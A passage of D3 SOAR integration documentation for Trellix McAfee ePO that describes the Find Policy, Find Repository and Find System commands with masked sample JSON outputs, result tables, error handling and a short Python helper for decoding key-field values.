\\r\\n  \\\"ENDP_FW_META\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"MCPSRVER1000\\\",\\r\\n \\r\\n  \\\"DXLBROKRMETA\\\",\\r\\n \\r\\n  \\\"DXLBROKRMETA\\\",\\r\\n \\r\\n  \\\"DXLBROKRMETA\\\",\\r\\n \\r\\n  
\\\"DXLCLNT_META\\\",\\r\\n \\r\\n  \\\"DXLCLNT_META\\\",\\r\\n \\r\\n  \\\"DXLCLNT_META\\\",\\r\\n \\r\\n  \\\"TIEMGMT_META\\\",\\r\\n \\r\\n  \\\"TIEMGMT_META\\\",\\r\\n \\r\\n  \\\"MVEDR___META\\\",\\r\\n \\r\\n  \\\"MVEDR___META\\\",\\r\\n \\r\\n  \\\"TELEMTRY1000\\\",\\r\\n \\r\\n  \\\"TELEMTRY1000\\\"\\r\\n \\r\\n ]\"",
    "productName": "\"[\\r\\n \\r\\n  \\\"Active Response 2.4.0\\\",\\r\\n \\r\\n  \\\"Active Response 2.4.0\\\",\\r\\n \\r\\n  \\\"Cloud Workload Security \\\",\\r\\n \\r\\n  \\\"Cloud Workload Security \\\",\\r\\n \\r\\n  \\\"Cloud Workload Security \\\",\\r\\n \\r\\n  \\\"Cloud Workload Security \\\",\\r\\n \\r\\n  \\\"Common Appliance Management 1.1.0\\\",\\r\\n \\r\\n  \\\"Data Loss Prevention 11.2\\\",\\r\\n \\r\\n  \\\"Data Loss Prevention 11.2\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management 11.1.0\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management 11.1.0\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management 11.1.0\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management 11.1.0\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management 11.1.0\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management 11.1.0\\\",\\r\\n \\r\\n  \\\"Endpoint Security Adaptive Threat Protection \\\",\\r\\n \\r\\n  \\\"Endpoint Security Adaptive Threat Protection \\\",\\r\\n \\r\\n  \\\"Endpoint Security Adaptive Threat Protection \\\",\\r\\n \\r\\n  \\\"Endpoint Security Common \\\",\\r\\n \\r\\n  \\\"Endpoint Security Firewall \\\",\\r\\n \\r\\n  \\\"Endpoint Security Firewall \\\",\\r\\n \\r\\n  \\\"Endpoint Security Firewall \\\",\\r\\n \\r\\n  \\\"Endpoint Security Firewall \\\",\\r\\n \\r\\n  \\\"Endpoint Security Firewall \\\",\\r\\n \\r\\n  \\\"Endpoint Security Firewall \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web 
Control \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"McAfee Agent \\\",\\r\\n \\r\\n  \\\"McAfee Agent \\\",\\r\\n \\r\\n  \\\"McAfee Agent \\\",\\r\\n \\r\\n  \\\"McAfee Agent \\\",\\r\\n \\r\\n  \\\"McAfee Agent \\\",\\r\\n \\r\\n  \\\"McAfee Agent \\\",\\r\\n \\r\\n  \\\"McAfee Client Proxy 2.3.5\\\",\\r\\n \\r\\n  \\\"McAfee DXL Broker Management 5.0.1\\\",\\r\\n \\r\\n  \\\"McAfee DXL Broker Management 5.0.1\\\",\\r\\n \\r\\n  \\\"McAfee DXL Broker Management 5.0.1\\\",\\r\\n \\r\\n  \\\"McAfee DXL Client 5.0.1\\\",\\r\\n \\r\\n  \\\"McAfee DXL Client 5.0.1\\\",\\r\\n \\r\\n  \\\"McAfee DXL Client 5.0.1\\\",\\r\\n \\r\\n  \\\"McAfee Threat Intelligence Exchange Server Management 2.3.0\\\",\\r\\n \\r\\n  \\\"McAfee Threat Intelligence Exchange Server Management 2.3.0\\\",\\r\\n \\r\\n  \\\"MVISION EDR \\\",\\r\\n \\r\\n  \\\"MVISION EDR \\\",\\r\\n \\r\\n  \\\"Product Improvement Program \\\",\\r\\n \\r\\n  \\\"Product Improvement Program \\\"\\r\\n \\r\\n ]\"",
    "typeId": "\"[\\r\\n \\r\\n  *****,\\r\\n \\r\\n  ***** ]\"",
    "typeName": "\"[\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"Assessment Rules - Firewall\\\",\\r\\n \\r\\n  \\\"Assessment Rules - General\\\",\\r\\n \\r\\n  \\\"Auto-Remediation Settings\\\",\\r\\n \\r\\n  \\\"Assessment Rules - Container\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"DLP Policy\\\",\\r\\n \\r\\n  \\\"Server Configuration\\\",\\r\\n \\r\\n  \\\"General \\\",\\r\\n \\r\\n  \\\"McAfee DLP Prevent Email Settings\\\",\\r\\n \\r\\n  \\\"McAfee DLP Capture Settings\\\",\\r\\n \\r\\n  \\\"Users and Groups\\\",\\r\\n \\r\\n  \\\"McAfee DLP Prevent Web Settings\\\",\\r\\n \\r\\n  \\\"McAfee DLP Monitor Settings\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Dynamic Application Containment\\\",\\r\\n \\r\\n  \\\"Dynamic Application Containment\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Rules\\\",\\r\\n \\r\\n  \\\"Rules\\\",\\r\\n \\r\\n  \\\"Rules\\\",\\r\\n \\r\\n  \\\"On-Access Scan\\\",\\r\\n \\r\\n  \\\"On-Access Scan\\\",\\r\\n \\r\\n  \\\"On-Demand Scan\\\",\\r\\n \\r\\n  \\\"On-Demand Scan\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Access Protection\\\",\\r\\n \\r\\n  \\\"Access Protection\\\",\\r\\n \\r\\n  \\\"Exploit Prevention\\\",\\r\\n \\r\\n  \\\"Exploit Prevention\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Enforcement Messaging\\\",\\r\\n \\r\\n  \\\"Enforcement Messaging\\\",\\r\\n \\r\\n  \\\"Block and Allow List\\\",\\r\\n \\r\\n  \\\"Block and Allow List\\\",\\r\\n \\r\\n  \\\"Content Actions\\\",\\r\\n \\r\\n  \\\"Content Actions\\\",\\r\\n \\r\\n  \\\"Browser Control\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"Repository\\\",\\r\\n \\r\\n  \\\"Troubleshooting\\\",\\r\\n \\r\\n  \\\"Product Improvement Program\\\",\\r\\n \\r\\n  \\\"Custom 
Properties\\\",\\r\\n \\r\\n  \\\"MCP Policy\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"TIE Server Settings\\\",\\r\\n \\r\\n  \\\"TIE Server Settings\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\"\\r\\n \\r\\n ]\""
}

Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful

Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

| productId | featureName | typeName | objectName | typeId | featureId | objectId | productName | objectNotes |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| MARCOBA_META | MARCOBA_META | General | My Default | *** | MARCOBA_META | *** | Active Response 2.4.1 | |
| MARCOBA_META | MARCOBA_META | General | My Default (Tim-2) | *** | MARCOBA_META | *** | Active Response 2.4.1 | |

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
| --- | --- | --- |
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Find Policy failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Find Policy failed.

Status Code: 401.

Message: Unauthorized.

Find Repository

Retrieves an ePO repository based on the provided search text.

Input

| Input Parameter | Required/Optional | Description | Example |
| --- | --- | --- | --- |
| Search Text | Optional | The search text defining the condition to retrieve a repository. | 3 |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "SAServerDNS": "",
        "disableV1DATReplication": false,
        "spipeServerDNS": null,
        "repositoryTypeString": "master",
        "useAnonCreds": false,
        "downloadCredPassword": "",
        "downloadCredDomain": "",
        "lockType": 0,
        "enabled": true,
        "uncUseLoggedOnUser": false,
        "uncOrder": "1",
        "protocol": 1,
        "lockedBy": "",
        "softwareInclusionList": [],
        "uploadCredUsername": "",
        "spipeVersion": "4.5.0",
        "SAServerNetbios": "",
        "protocolString": "SpipeSite",
        "disableFullDATReplication": false,
        "replicationUNC": "",
        "SAServerIP": "",
        "addressType": null,
        "autoID": 3,
        "softwareExclusionList": null,
        "repositoryTypeAsString": null,
        "repositoryName": "*****-AD",
        "spipeServerName": "*****-AD",
        "uploadCredDomain": "",
        "repositoryPort": *****,
        "downloadPasswordEncrypted": true,
        "httpUseAuth": false,
        "downloadCredUsername": "",
        "includeAllSoftware": true,
        "repositoryId": "*****-AD",
        "repositoryType": 2,
        "location": "*****-AD/Software",
        "updateExclusionList": true,
        "spipeServerIP": "1.1.1.1",
        "uploadCredPassword": "",
        "fallback": false,
        "repliPasswordEncrypted": true
    }
]

Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "SAServerDNS": "",
        "disableV1DATReplication": false,
        "spipeServerDNS": null,
        "repositoryTypeString": "master",
        "useAnonCreds": false,
        "downloadCredPassword": "",
        "downloadCredDomain": "",
        "lockType": 0,
        "enabled": true,
        "uncUseLoggedOnUser": false,
        "uncOrder": "1",
        "protocol": 1,
        "lockedBy": "",
        "softwareInclusionList": [],
        "uploadCredUsername": "",
        "spipeVersion": "4.5.0",
        "SAServerNetbios": "",
        "protocolString": "SpipeSite",
        "disableFullDATReplication": false,
        "replicationUNC": "",
        "SAServerIP": "",
        "addressType": null,
        "autoID": 3,
        "softwareExclusionList": null,
        "repositoryTypeAsString": null,
        "repositoryName": "*****-AD",
        "spipeServerName": "*****-AD",
        "uploadCredDomain": "",
        "repositoryPort": *****,
        "downloadPasswordEncrypted": true,
        "httpUseAuth": false,
        "downloadCredUsername": "",
        "includeAllSoftware": true,
        "repositoryId": "*****-AD",
        "repositoryType": 2,
        "location": "*****-AD/Software",
        "updateExclusionList": true,
        "spipeServerIP": "1.1.1.1",
        "uploadCredPassword": "",
        "fallback": false,
        "repliPasswordEncrypted": true
    }
]

Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[{\\r\\n        \\\"SAServerDNS\\\": \\\"\\\",\\r\\n        \\\"disableV1DATReplication\\\": false,\\r\\n        \\\"spipeServerDNS\\\": null,\\r\\n        \\\"repositoryTypeString\\\": \\\"mirror\\\",\\r\\n        \\\"useAnonCreds\\\": false,\\r\\n        \\\"downloadCredPassword\\\": \\\"\\\",\\r\\n        \\\"downloadCredDomain\\\": \\\"\\\",\\r\\n        \\\"lockType\\\": 0,\\r\\n        \\\"enabled\\\": true,\\r\\n        \\\"uncUseLoggedOnUser\\\": false,\\r\\n        \\\"uncOrder\\\": \\\"1\\\",\\r\\n        \\\"protocol\\\": 4,\\r\\n        \\\"lockedBy\\\": \\\"\\\",\\r\\n        \\\"softwareInclusionList\\\": [],\\r\\n        \\\"uploadCredUsername\\\": \\\"\\\",\\r\\n        \\\"spipeVersion\\\": \\\"4.5.0\\\",\\r\\n        \\\"SAServerNetbios\\\": \\\"\\\",\\r\\n        \\\"protocolString\\\": \\\"FTPSite\\\",\\r\\n        \\\"disableFullDATReplication\\\": false,\\r\\n        \\\"replicationUNC\\\": \\\"\\\",\\r\\n        \\\"SAServerIP\\\": \\\"\\\",\\r\\n        \\\"addressType\\\": null,\\r\\n        \\\"autoID\\\": 1,\\r\\n        \\\"softwareExclusionList\\\": null,\\r\\n        \\\"repositoryTypeAsString\\\": null,\\r\\n        \\\"repositoryName\\\": \\\"McAfeeFtp\\\",\\r\\n        \\\"spipeServerName\\\": null,\\r\\n        \\\"uploadCredDomain\\\": \\\"\\\",\\r\\n        \\\"repositoryPort\\\": 21,\\r\\n        \\\"downloadPasswordEncrypted\\\": true,\\r\\n        \\\"httpUseAuth\\\": false,\\r\\n        \\\"downloadCredUsername\\\": \\\"anonymous\\\",\\r\\n        \\\"includeAllSoftware\\\": true,\\r\\n        \\\"repositoryId\\\": \\\"McAfeeFtp\\\",\\r\\n        \\\"repositoryType\\\": 1,\\r\\n        \\\"location\\\": \\\"ftp.nai.com/CommonUpdater\\\",\\r\\n        \\\"updateExclusionList\\\": true,\\r\\n        \\\"spipeServerIP\\\": null,\\r\\n        \\\"uploadCredPassword\\\": \\\"\\\",\\r\\n        \\\"fallback\\\": false,\\r\\n        \\\"repliPasswordEncrypted\\\": true\\r\\n    }]\"",
    "disableV1DATReplication": "\"[\\r\\n \\r\\n  false\\r\\n \\r\\n ]\"",
    "location": "\"[\\r\\n \\r\\n  \\\"*****-AD/Software\\\"\\r\\n \\r\\n ]\"",
    "protocolString": "\"[\\r\\n \\r\\n  \\\"SpipeSite\\\"\\r\\n \\r\\n ]\"",
    "repositoryId": "\"[\\r\\n \\r\\n  \\\"*****-AD\\\"\\r\\n \\r\\n ]\"",
    "repositoryName": "\"[\\r\\n \\r\\n  \\\"*****-AD\\\"\\r\\n \\r\\n ]\"",
    "repositoryPort": "\"[\\r\\n \\r\\n  *****\\r\\n \\r\\n ]\"",
    "repositoryType": "\"[\\r\\n \\r\\n  2\\r\\n \\r\\n ]\"",
    "spipeServerIP": "\"[\\r\\n \\r\\n  \\\"1.1.1.1\\\"\\r\\n \\r\\n ]\"",
    "spipeServerName": "\"[\\r\\n \\r\\n  \\\"*****-AD\\\"\\r\\n \\r\\n ]\"",
    "spipeVersion": "\"[\\r\\n \\r\\n  \\\"4.5.0\\\"\\r\\n \\r\\n ]\""
}
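
Each value in the Key Fields sample above is a JSON array that was serialized to text and then quoted again as a JSON string, so a playbook script must peel more than one layer before it can read the data. The Python below is an added example, not D3's or Trellix's code: it decodes a subset of that sample and reports masked values such as ***** as undecodable instead of failing. The function names and MAX_LAYERS are assumptions made for illustration.

```python
import json

# Subset of the Find Repository Key Fields sample above, copied verbatim.
# "repositoryPort" keeps the documentation's ***** mask, which is not valid JSON.
SAMPLE_KEY_FIELDS = r'''{
    "protocolString": "\"[\\r\\n \\r\\n  \\\"SpipeSite\\\"\\r\\n \\r\\n ]\"",
    "repositoryType": "\"[\\r\\n \\r\\n  2\\r\\n \\r\\n ]\"",
    "repositoryPort": "\"[\\r\\n \\r\\n  *****\\r\\n \\r\\n ]\"",
    "spipeServerIP": "\"[\\r\\n \\r\\n  \\\"1.1.1.1\\\"\\r\\n \\r\\n ]\""
}'''

MAX_LAYERS = 4  # assumption: upper bound on nested string encodings


def decode_key_field(value, max_layers=MAX_LAYERS):
    """Peel JSON string layers off one Key Fields value.

    Returns a dict with:
      value      - the list/number/object reached, or the last text that
                   could not be parsed (masked or free-form content)
      layers     - how many json.loads() calls succeeded
      structured - True only when a non-string value was reached
    """
    current, layers = value, 0
    while isinstance(current, str) and layers < max_layers:
        try:
            current = json.loads(current)
        except json.JSONDecodeError:
            # Masked (*****) or plain-text content: stop and hand back the text.
            return {"value": current.strip(), "layers": layers, "structured": False}
        layers += 1
    return {
        "value": current,
        "layers": layers,
        "structured": not isinstance(current, str),
    }


def decode_key_fields(document_text):
    """Parse the Key Fields JSON object and decode every field in it."""
    outer = json.loads(document_text)
    if not isinstance(outer, dict):
        raise ValueError("Key Fields sample is expected to be a JSON object")
    return {name: decode_key_field(raw) for name, raw in outer.items()}


def first_value(fields, name):
    """First element of a decoded field, or None if absent, empty or masked."""
    entry = fields.get(name)
    if not entry or not entry["structured"]:
        return None
    value = entry["value"]
    if isinstance(value, list):
        return value[0] if value else None
    return value


if __name__ == "__main__":
    decoded = decode_key_fields(SAMPLE_KEY_FIELDS)
    for name, entry in decoded.items():
        print(f"{name}: {entry['value']!r} (layers={entry['layers']}, "
              f"structured={entry['structured']})")
```

Checking the structured flag before using a field keeps a masked or malformed value from flowing into a later playbook task as if it were real data.
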
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful

Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

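| SAServerDNS | disableV1DATReplication | spipeServerDNS | repositoryTypeString | useAnonCreds | downloadCredPassword | downloadCredDomain | lockType | enabled | uncUseLoggedOnUser | uncOrder | protocol | lockedBy | softwareInclusionList | uploadCredUsername | spipeVersion | SAServerNetbios | protocolString | disableFullDATReplication | replicationUNC | SAServerIP | addressType | autoID | softwareExclusionList | repositoryTypeAsString | repositoryName | spipeServerName | uploadCredDomain | repositoryPort | downloadPasswordEncrypted | httpUseAuth | downloadCredUsername | includeAllSoftware | repositoryId | repositoryType | location | updateExclusionList | spipeServerIP | uploadCredPassword | fallback | repliPasswordEncrypted |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| | False | | master | False | | | 0 | True | False | 1 | 1 | | [] | | 4.5.0 | | SpipeSite | False | | | | 3 | | | ***-AD | *** | | *** | True | False | | True | ***-AD | 2 | ***-AD/Software | True | 1.1.1.1 | | False | True |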

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
| --- | --- | --- |
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Find Repository failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Find Repository failed.

Status Code: 401.

Message: Unauthorized.

Find System

Retrieves system information based on the provided name or IP address.

Input

| Input Parameter | Required/Optional | Description | Example |
| --- | --- | --- | --- |
| Search Text | Optional | The IP address or name of the system to search. | ***-DC |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
    "results": [
        {
            "EPOComputerProperties.ParentID": *****,
            "EPOComputerProperties.ComputerName": "*****",
            "EPOComputerProperties.Description": null,
            "EPOComputerProperties.ComputerDescription": "N/A",
            "EPOComputerProperties.TimeZone": "Pacific Standard Time",
            "EPOComputerProperties.DefaultLangID": "*****",
            "EPOComputerProperties.UserName": "administrator",
            "EPOComputerProperties.DomainName": "*****",
            "EPOComputerProperties.IPHostName": "*****-DC.*****.local",
            "EPOComputerProperties.IPV6": "0:0:0:0:0:FFFF:C0A0:000",
            "EPOComputerProperties.IPAddress": "1.1.1.1",
            "EPOComputerProperties.IPSubnet": "0:0:0:0:0:FFFF:C0A0:000",
            "EPOComputerProperties.IPSubnetMask": "0:0:0:0:0:FFFF:FFFF:FF00",
            "EPOComputerProperties.IPV4x": *****,
            "EPOComputerProperties.IPXAddress": "N/A",
            "EPOComputerProperties.SubnetAddress": "1.1.1.1",
            "EPOComputerProperties.SubnetMask": "2.2.2.2",
            "EPOComputerProperties.NetAddress": "*****",
            "EPOComputerProperties.OSType": "Windows Server 2019",
            "EPOComputerProperties.OSVersion": "10.0",
            "EPOComputerProperties.OSCsdVersion": "",
            "EPOComputerProperties.OSBuildNum": *****,
            "EPOComputerProperties.OSPlatform": "Server",
            "EPOComputerProperties.OSOEMID": "*****-*****-*****-*****",
            "EPOComputerProperties.CPUType": "Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz",
            "EPOComputerProperties.CPUSpeed": 3392,
            "EPOComputerProperties.NumOfCPU": 8,
            "EPOComputerProperties.CPUSerialNumber": "N/A",
            "EPOComputerProperties.TotalPhysicalMemory": 17159188480,
            "EPOComputerProperties.FreeMemory": 8900734976,
            "EPOComputerProperties.FreeDiskSpace": 2005585,
            "EPOComputerProperties.TotalDiskSpace": 2059762,
            "EPOComputerProperties.IsPortable": 0,
            "EPOComputerProperties.Vdi": 0,
            "EPOComputerProperties.OSBitMode": 1,
            "EPOComputerProperties.LastAgentHandler": 1,
            "EPOComputerProperties.UserProperty1": "",
            "EPOComputerProperties.UserProperty2": "",
            "EPOComputerProperties.UserProperty3": "",
            "EPOComputerProperties.UserProperty4": "",
            "EPOComputerProperties.UserProperty5": "",
            "EPOComputerProperties.UserProperty6": "",
            "EPOComputerProperties.UserProperty7": "",
            "EPOComputerProperties.UserProperty8": "",
            "EPOComputerProperties.Free_Space_of_Drive_C": 1853153,
            "EPOComputerProperties.Total_Space_of_Drive_C": 1907177,
            "EPOLeafNode.Tags": "*****-dc, DC, DLP Deploy on Cyber-DC, Firewall For DC, Server",
            "EPOLeafNode.ExcludedTags": "",
            "EPOLeafNode.LastUpdate": "2020-03-16T08:12:02-07:00",
            "EPOLeafNode.ManagedState": 1,
            "EPOLeafNode.AgentGUID": "*****-*****-*****-*****-*****",
            "EPOLeafNode.AgentVersion": "5.6.1.157",
            "EPOBranchNode.AutoID": 7,
            "raw": "{'EPOComputerProperties.ParentID': *****, 'EPOComputerProperties.ComputerName': '*****-DC'}",
            "system": "*****-DC"
        }
    ]
}

Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
    "results": [
        {
            "EPOComputerProperties.ParentID": *****,
            "EPOComputerProperties.ComputerName": "*****",
            "EPOComputerProperties.Description": null,
            "EPOComputerProperties.ComputerDescription": "N/A",
            "EPOComputerProperties.TimeZone": "Pacific Standard Time",
            "EPOComputerProperties.DefaultLangID": "*****",
            "EPOComputerProperties.UserName": "administrator",
            "EPOComputerProperties.DomainName": "*****",
            "EPOComputerProperties.IPHostName": "*****-DC.*****.local",
            "EPOComputerProperties.IPV6": "0:0:0:0:0:FFFF:C0A0:000",
            "EPOComputerProperties.IPAddress": "1.1.1.1",
            "EPOComputerProperties.IPSubnet": "0:0:0:0:0:FFFF:C0A0:000",
            "EPOComputerProperties.IPSubnetMask": "0:0:0:0:0:FFFF:FFFF:FF00",
            "EPOComputerProperties.IPV4x": *****,
            "EPOComputerProperties.IPXAddress": "N/A",
            "EPOComputerProperties.SubnetAddress": "1.1.1.1",
            "EPOComputerProperties.SubnetMask": "2.2.2.2",
            "EPOComputerProperties.NetAddress": "*****",
            "EPOComputerProperties.OSType": "Windows Server 2019",
            "EPOComputerProperties.OSVersion": "10.0",
            "EPOComputerProperties.OSCsdVersion": "",
            "EPOComputerProperties.OSBuildNum": *****,
            "EPOComputerProperties.OSPlatform": "Server",
            "EPOComputerProperties.OSOEMID": "*****-*****-*****-*****",
            "EPOComputerProperties.CPUType": "Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz",
            "EPOComputerProperties.CPUSpeed": 3392,
            "EPOComputerProperties.NumOfCPU": 8,
            "EPOComputerProperties.CPUSerialNumber": "N/A",
            "EPOComputerProperties.TotalPhysicalMemory": 17159188480,
            "EPOComputerProperties.FreeMemory": 8900734976,
            "EPOComputerProperties.FreeDiskSpace": 2005585,
            "EPOComputerProperties.TotalDiskSpace": 2059762,
            "EPOComputerProperties.IsPortable": 0,
            "EPOComputerProperties.Vdi": 0,
            "EPOComputerProperties.OSBitMode": 1,
            "EPOComputerProperties.LastAgentHandler": 1,
            "EPOComputerProperties.UserProperty1": "",
            "EPOComputerProperties.UserProperty2": "",
            "EPOComputerProperties.UserProperty3": "",
            "EPOComputerProperties.UserProperty4": "",
            "EPOComputerProperties.UserProperty5": "",
            "EPOComputerProperties.UserProperty6": "",
            "EPOComputerProperties.UserProperty7": "",
            "EPOComputerProperties.UserProperty8": "",
            "EPOComputerProperties.Free_Space_of_Drive_C": 1853153,
            "EPOComputerProperties.Total_Space_of_Drive_C": 1907177,
            "EPOLeafNode.Tags": "*****-dc, DC, DLP Deploy on Cyber-DC, Firewall For DC, Server",
            "EPOLeafNode.ExcludedTags": "",
            "EPOLeafNode.LastUpdate": "2020-03-16T08:12:02-07:00",
            "EPOLeafNode.ManagedState": 1,
            "EPOLeafNode.AgentGUID": "*****-*****-*****-*****-*****",
            "EPOLeafNode.AgentVersion": "5.6.1.157",
            "EPOBranchNode.AutoID": 7,
            "raw": "{'EPOComputerProperties.ParentID': *****, 'EPOComputerProperties.ComputerName': '*****-DC'}",
            "system": "*****-DC"
        }
    ]
}
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "tagId": "\"[\\r\\n \\r\\n  43\\r\\n \\r\\n ]\"",
    "tagName": "\"[\\r\\n \\r\\n  \\\"TestTag\\\"\\r\\n \\r\\n ]\"",
